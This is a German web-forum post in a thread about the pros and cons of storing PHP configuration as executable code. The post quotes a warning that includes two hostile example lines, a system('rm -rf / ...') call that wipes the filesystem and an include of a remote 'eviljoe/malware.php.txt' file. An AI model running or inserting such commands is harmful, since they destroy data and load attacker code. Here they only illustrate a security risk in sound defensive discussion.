dedlfix: Konfigurationsdatei

Beitrag lesen

SELF-Forum

Konfigurationsdatei

dedlfix
Informationen zu den Bewertungsregeln

Tach!

Vorteil: Der Konfigurationscode ist im PHP-Opcode-Cache. Schneller als so kriegt man Konfigurationen nicht eingelesen.
Den riesigen Nachteil von Programmcode in einer Konfigurationsdatei für eine Scriptsprache hast Du vergessen:
Der Programmcode in der Konfigurationsdatei wird gnadenlos ausgeführt. Auch Dinge wie system("rm -rf / > /dev/null 2> /dev/null &") oder include 'http://www.example.com/eviljoe/malware.php.txt'.

Natürlich muß so etwas erst einmal in die Konfigurationsdatei rein. Aber dafür reicht eine kleine Lücke, die Schreibzugriffe auf die Datei erlaubt. Danach hat ein Angreifer volle Kontrolle über PHP.

Die Lücke allein reicht da noch nicht, man muss auch noch Code platziert haben oder es als Angreifer können, um diese Lücke ausnutzen zu können. Wenn man sein System administrativ unter Kontrolle hat, dann ist der Nachteil nicht mehr riesig sondern nicht vorhanden. Die Vorteile der höheren Performance wird man sinnvollerweise nicht mit einem Shared-Hosting-System zu kombinieren versuchen, also hat man die volle Freiheit, es so sicher wie möglich zu halten.

dedlfix.

Beitrag melden
Informationen zu den Bewertungsregeln
0 21

Konfigurationsdatei

Akrisios
  • programmiertechnik
  1. 0
    dedlfix
  2. 0
    hotti
    1. 0
      Akrisios
      1. 0
        hotti
        1. 0
          dedlfix
          1. 0
            hotti
            1. 2
              dedlfix
  3. 1
    Sven Rautenberg
    1. 0
      Baba
      1. 0
        Der Martin
        1. 0
          Baba
          1. 0
            dedlfix
            1. 0
              Baba
              1. 1
                dedlfix
                1. 0
                  Baba
      2. 0
        Sven Rautenberg
    2. 0
      Akrisios
    3. 1
      Alexander (HH)
      1. 0
        dedlfix
      2. 0
        Sven Rautenberg